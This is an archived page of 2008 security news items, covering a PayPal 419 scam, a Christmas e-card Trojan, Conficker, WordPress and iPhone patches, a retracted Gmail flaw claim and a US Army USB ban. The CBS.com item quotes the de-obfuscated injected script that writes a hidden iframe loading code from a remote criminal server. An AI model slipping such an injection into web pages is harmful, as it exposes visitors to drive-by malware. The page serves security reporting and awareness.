CyberInsecure.com

Archive for November, 2008

A new variant of popular Nigerian 419 scam is possible via Paypal, according to report by Inquirer. The 419 scam is named after the relevant section of the Nigerian Criminal Code and the premise is always the same. Somebody offers to pay money into your account and give you a cut when you send it back. In truth the whole thing is money laundering but this latest twist – using Paypal – is significant because, on the surface, it looks like there’s no catch.

Instead of receiving the offer via email (as is normally the case), this person was approached over a Skype chat session. The perpetuator wants to transfer funds out a Paypal account and convert them back into US dollars. All the victim needed to do was check his Paypal account and when the money arrived, send a significantly lower amount back via Western Union.

Due to Paypal’s payment reversal policy, there is a loophole which enables the scam to work. As the payment would be classified as ’services’ rather than goods, there would be no proof that the the victim – who becomes the ‘vendor’ – provided any goods. So the ‘buyer’ – in this case the scammer – gets the money back. In the meantime, the vendor has sent the dollars via Western Union and then finds himself stuck with no means of recourse.

Both Western Union and Paypal can be blamed for making this scam work. Western Union makes it too easy to send and receive money anonymously while Paypal’s dispute resolution procedure system is a crude automated system.

Websense Security Labs has discovered that malware authors are already using Christmas themes this year as a social engineering tactic, in an effort to gain control over compromised machines. This campaign uses email messages in the form of e-greetings, leading to supposed animated postcards. These actually lead to a Trojan backdoor that has been distributed in previous malicious spam campaigns.

The email messages, spoofed to appear as though they have been sent from postcards.org, display an animated Christmas scene. A URL link within the email leads to a malicious file called postcard.exe hosted on various servers, including those in the .com domain space.

Once executed, a backdoor is created by the malware author enabling access and control over the resources of the compromised machine. Control is conducted over IRC, communicating with ircserver.*snip*.la. During the install process an image called xmas.jpg is displayed to the user as a distraction technique.

Example of malicious email:

Once again legitimate website was infected with malicious obfuscated code, this time it was CBS.com. It seems popular sites with very high traffic remain a favorite and highly effective attack vector for hackers.

Today Finjan has revealed that the subdomain of a famous radio and television network, etix.cbs.com, was compromised as a result of malicious activity. The cybercriminals added a malicious obfuscated script to the infected page. The injected script added a malicious IFrame to the page.

The injected IFrame automatically loads another malicious script from a remote server controlled by criminals in Russia, causing a possible installation of malware on the unsuspecting client machine. De-obfuscated script code from cbs.com sub-domain:

<SCRIPT> window.status=’Done’; document.write(’<iframe name=29dee5c6 src=\’http://[REMOVED]/.if/go.html?’ +Math.round(Math.random()*257224)+’3e78\’ width=632 height=407 style=\’display: none\’></iframe>’) </SCRIPT>

The malicious Russian server, from which the IFrame pulled the malicious code located in Saint Petersburg, hosted by “ZAO National Telecomunications ISP”.

Finjan immediately informed CBS.com of the infection and currently the remote Russian server is down.

Microsoft’s Security Response Center and McAfee are warning on increased network scanning activity during the last couple of days courtesy of the very latest W32/Conficker.worm exploiting the already patched MS08-067 vulnerability. After last month’s ruckus made by Microsoft’s out-of-band patch, another threat leveraging the MS08-067 vulnerability was recently reported to have been causing more trouble in the wild.

What’s particularly interesting in the latest wave of copycat worms is that W32/Conficker.worm is patching the infected host in order to ensure that competing malicious parties wouldn’t be able to get in using it.

This malware mostly spreads within corporations but also was reported by several hundred home users. It opens a random port between port 1024 and 10000 and acts like a web server. It propagates to random computers on the network by exploiting MS08-067. Once the remote computer is exploited, that computer will download a copy of the worm via HTTP using the random port opened by the worm. The worm often uses a .JPG extension when copied over and then it is saved to the local system folder as a random named dll.

At McAfee Avert Labs they have also seen a few proof-of-concept binaries using the exploit code that was released into the wild to attack this Windows Server Service vulnerability; the latest is W32/Conficker.worm. According to the description in their Virus Information Library, W32/Conficker.worm decides how it will load itself as a Windows Service depending on whether the compromised version of Windows is Windows 2000. Once loaded in the service space, the worm attempts to download files from the Internet–specifically, further malware from trafficconverter.biz and data files from maxmind.com.

The public release of the proof of concept code in September, prompted an immediate reaction by international underground communities releasing several different modifications of the exploit, with the Chinese to be first to release a do-it-yourself tool allowing subnet scanning and automatic exposure to malware hosted on a third-party server.

WordPress has fixed a cross-site scripting (XSS) flaw in its blogging software. The flaw only affects IP-based virtual servers running on Apache 2.x. Version 2.6.5 also addresses three unrelated performance and stability bugs with the open source package.

The first prevents accidentally saving post meta information to a revision. The second prevents XML-RPC from fetching incorrect post types. The third adds some user ID sanitization during bulk delete requests. For a list of changed files, consult the full changeset between 2.6.3 and 2.6.5.

In those setups it might be possible for hackers to rig systems so that they serve up malicious Java Script from domains under their control.

WordPress has jumped from version 2.6.3 to 2.6.5 of the software in order to avoid confusion with 2.6.4, a fake version recently offered up by black hats via a bogus site WordpresZ. Webmasters were directed to download the backdoor-rigged code earlier this month by hackers exploiting vulnerabilities in the blogging package. There is not and never will be an official 2.6.4 version.

If you are a Wordpress blog owner and interested only in the security fix, copy wp-includes/feed.php and wp-includes/version.php from the 2.6.5 release package.

Online thieves managed to penetrate the defenses of Pamela Systems by exploiting a security hole in an unnamed application the website uses, according to Dick H. Schiferli, Pamela’s founder and CEO. Pamela is a piece of software that manages Skype users online phone accounts. The users who use this software should be on the lookout for customized phishing attacks due to hacked user databases containing names and email addresses.

The attack, which took place last week, has already led to one phishing campaign that calls recipients by their real names and then tries to trick them into turning over personal information. That added personal touch could throw some users off guard because most phishing emails address their marks by generic terms such as “Dear PayPal User.”

It is unclear how many of the site’s users had their information stolen, or how many users have registered with his site. Pamela boasts 4.5 million downloads, although the number of registered users is probably much smaller. Schiferli said his team was still in the process of contacting customers whose information was stolen. “This is our first experience with something like this,” he said. “We’re taking this very seriously. We contacted PayPal last week.” So far, they’ve yet to get a response.

The breach could prove valuable because ostensibly everyone in the user database uses Skype. That allows fraudsters with important leads and information to tailor scams.

Credit: The Register

A Gmail security vulnerability may allow an attacker to set up filters on users’ e-mail accounts without their knowledge, according to a proof of concept posted Sunday at GeekCondition.com. The vulnerability has already caused some people to lose their domain names registered through GoDaddy.com.

The exploit starts when user visits a malicious site while logged into Gmail. Whether the link is initiated through Gmail account or not, the malicious site can access internal credentials. After this, the malicious site can unnoticeably send data to Gmail that can create an automatic filter that diverts incoming e-mail to a different e-mail account. Given all this happens on Google’s mail servers, it can be noticed only by looking at account’s filters.

Along with gaining access to private messages, this exploit once in place compromises all future e-mails in that account. For example, if your Gmail details are registered as the contact details for any domain registrations, your domain might be hijacked and held to ransom by the use of account recovery and password resetting tools on your domain host account without your knowledge.

Without posting the full exploit, a post on GeekCondition explains how the flaw relies on obtaining the variables that represent the user name and “at”. When user creates a filter in Gmail account, a request is sent to Google’s servers to be processed. The request is made in the form of a URL with many variables. For security reasons, the browser doesn’t display all the variable contained within the URL. However, by using FireFox and a plugin called Live HTTP Headers, anyone can see exactly what variables are sent from the browser to Google’s servers. After that, an attacker just needs to identify the variable that is the equivalent of the username.

Obtaining this variable is tricky but possible, there are plenty of explanations about it that can be easily found in Google. The “at” variable can be obtained by visiting a malicious Web site and a part of the flaw might be the expiration of “at” variable after every request instead after every session.

Until this is fixed, users should check their filters often to avoid being a victim of the vulnerability. As in many other cases, Firefox users can download an extension called NoScript that helps prevent these attacks. Gmail users should also logout of their accounts when they are not in use, and not visit suspicious or untrusted websites.

Google did not comment on this issue at this point but it will most likely be fixed in the next couple of days.

Update (Nov 26): According to recent post in Google blog, there is no evidence of a Gmail vulnerability. With help from affected users, Google determined that the cause was a phishing scheme, a common method used by malicious actors to trick people into sharing their sensitive information. Attackers sent customized e-mails encouraging web domain owners to visit fraudulent websites such as “google-hosts.com” that they set up purely to harvest usernames and passwords.

It seems like novice “webmasters” and domain owners submitted the details needed to steal their domains on fake login pages and then panicked and blamed Gmail without realizing that the filters were not set through Gmail flaw by a “magic” URL but manually, by miscreants who logged into the Gmail accounts using phished passwords.

An Austrian security vendor has found a vulnerability in Windows Vista that it says could possibly allow an attacker to run unauthorized code on a PC. The vulnerability could allow a hacker to install a rootkit that is very difficult to detect and remove from a computer or any other malicious software.

The problem is rooted in the Device IO Control, which handles internal device communication. Researchers at Phion have found two different ways to cause a buffer overflow that could corrupt the memory of the operating system’s kernel.

In one of the scenarios, a person would already have to have administrative rights to the PC. In general, vulnerabilities that require that level of access somewhat undermine the risk since the attacker already has permission to use to the PC. But it may be possible to trigger the buffer overflow without administrative rights, said Thomas Unterleitner, Phion’s director of endpoint security software.

Phion notified Microsoft about the problem on 22 October. Microsoft indicated to Phion that it would issue a patch with Vista’s next service pack. Microsoft released a beta version of Vista’s second service pack to testers last month. Vista’s Service Pack 2 is due for release by June 2009.

Unterleitner said there has been lots of interest in the vulnerability. “We have received requests for detailed information on how to take advantage of this exploit from all over the world,” he said.

Currently there are no comments from Microsoft officials on this issue.

Apple has released iPhone OS 2.2 with patches for 12 documented security flaws, some very serious. The vulnerabilities covered by the patch (which also affect iPod Touch) could allow remote code execution, information theft, software crashes and weakened encryption settings.

The updates include:

CVE-2008-2321: CoreGraphics contains memory corruption issues in the processing of arguments. Passing untrusted input to CoreGraphics via an application, such as a web browser, may lead to an unexpected application termination or arbitrary code execution.

CVE-2008-2327: Multiple uninitialized memory access issues exist in libTIFF’s handling of LZW-encoded TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution.

CVE-2008-1586: A memory exhaustion issue exists in the handling of TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected device reset.

CVE-2008-4227: The encryption level for PPTP VPN connections may revert to a previous lower setting. This update addresses the issue by properly setting the encryption preferences.

CVE-2008-4211: An issue in Office Viewer’s handling of columns in Microsoft Excel files may result in an out-of-bounds memory access. Viewing a maliciously crafted Microsoft Excel file may lead to an unexpected application termination or arbitrary code execution.

CVE-2008-4228: iPhone provides the ability to make an emergency call when locked. Currently, an emergency call may be placed to any number. A person with physical access to an iPhone may take advantage of this feature to place arbitrary calls which are charged to the iPhone owner.

CVE-2008-4229: The Passcode Lock feature is designed to prevent applications from being launched unless the correct passcode is entered. A race condition in the handling of device settings may cause the Passcode Lock to be removed when the device is restored from backup. This may allow a person with physical access to the device to launch applications without the passcode.

CVE-2008-4230: If an SMS message arrives while the emergency call screen is visible, the entire SMS message is displayed, even if the “Show SMS Preview” preference was set to “OFF”. This update addresses the issue by, in this situation, displaying only a notification that a SMS message has arrived, and not its content.

CVE-2008-4231: A memory corruption issue exists in the handling of HTML table elements. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution.

CVE-2008-4232: Safari allows an iframe element to display content outside its boundaries, which may lead to user interface spoofing.

CVE-2008-4233: If an application is launched via Safari while a call approval dialog is shown, the call will be placed. This may allow a maliciously crafted website to initiate a phone call without user interaction. Additionally, under certain circumstances it may be possible for a maliciously crafted website to block the user’s ability to cancel dialing for a short period of time.

CVE-2008-3644: Disabling autocomplete on a form field may not prevent the data in the field from being stored in the browser page cache. This may lead to the disclosure of sensitive information to a person with physical access to an unlocked device.

There are still several known phishing and spamming flaws in iPhone that remain unfixed.

Recent increase in malicious code propagating via USB flash drives forced the US Army to suspended the use of USB and removable media devices after a worm began spreading across its network. Use of USB drives, floppy discs, CDs, external drives, flash media cards and all other removable media devices has been placed on hold in order to contain the spread of Agent-BTZ, a variant of the SillyFDC worm. Such a temporary ban would cause inconvenience in any organisation, but for the US military it’s an even more serious problem because in many locations email or online transfer of files are not viable options.

The clampdown applies to both the the secret SIPR and unclassified NIPR networks, according to internal Army emails cited by Wired. Variants of the the SillyFDC worm are capable of spreading over networks or removable media devices, infecting any Windows PC they are plugged into or any external drive connected to an infected device, for example. The malware is programmed to download secondary infectious code from the internet, establishing a conduit that might be used to download keylogging software, password-siphoning spyware or botnet agents onto compromised machines.

Government-approved drives will reportedly be allowed back onto the network soon, but not before they’ve been scanned and cleared of malware infection. Government security teams will be running custom scripts and daily scans for the dual purposes of making sure the ban is enforced and detecting the spread of other forms of malware, Wired adds.

The ban, which gets in the way of troops’ normal work, might seem like over-kill, but without knowing the full specifics of the extent of the infection it’s probably a little unfair to label it as such. The security experts say that actions short of an outright ban may be appropriate for organisations facing similar problems.

Regular users and networks are suffering from malware infections via USB for some time now. Currently, there are two popular methods by which USB flash drives are being infected with malicious code. The first of these methods is referred to as simple file copy. This means that the malicious code initially resides on an infected computer and copies itself to all the storage devices connected to the affected computer. This method requires the user to access the USB flash drive and execute the malicious code.

The second method is referred to as AutoRun.inf modification. This means that the malicious code alters or creates an autorun.inf file on targeted storage devices connected to the affected computer. When an infected USB flash drive is connected to another computer, the malicious code can be automatically executed with no additional user interaction.

These are not the only two methods available. The users are encouraged to do the following to help mitigate the risks:

* Run antivirus software and keep the virus signatures up to date.

* Do not connect an unknown or untrusted USB drive to your computer.

* Disable AutoRun or AutoPlay features for removable media.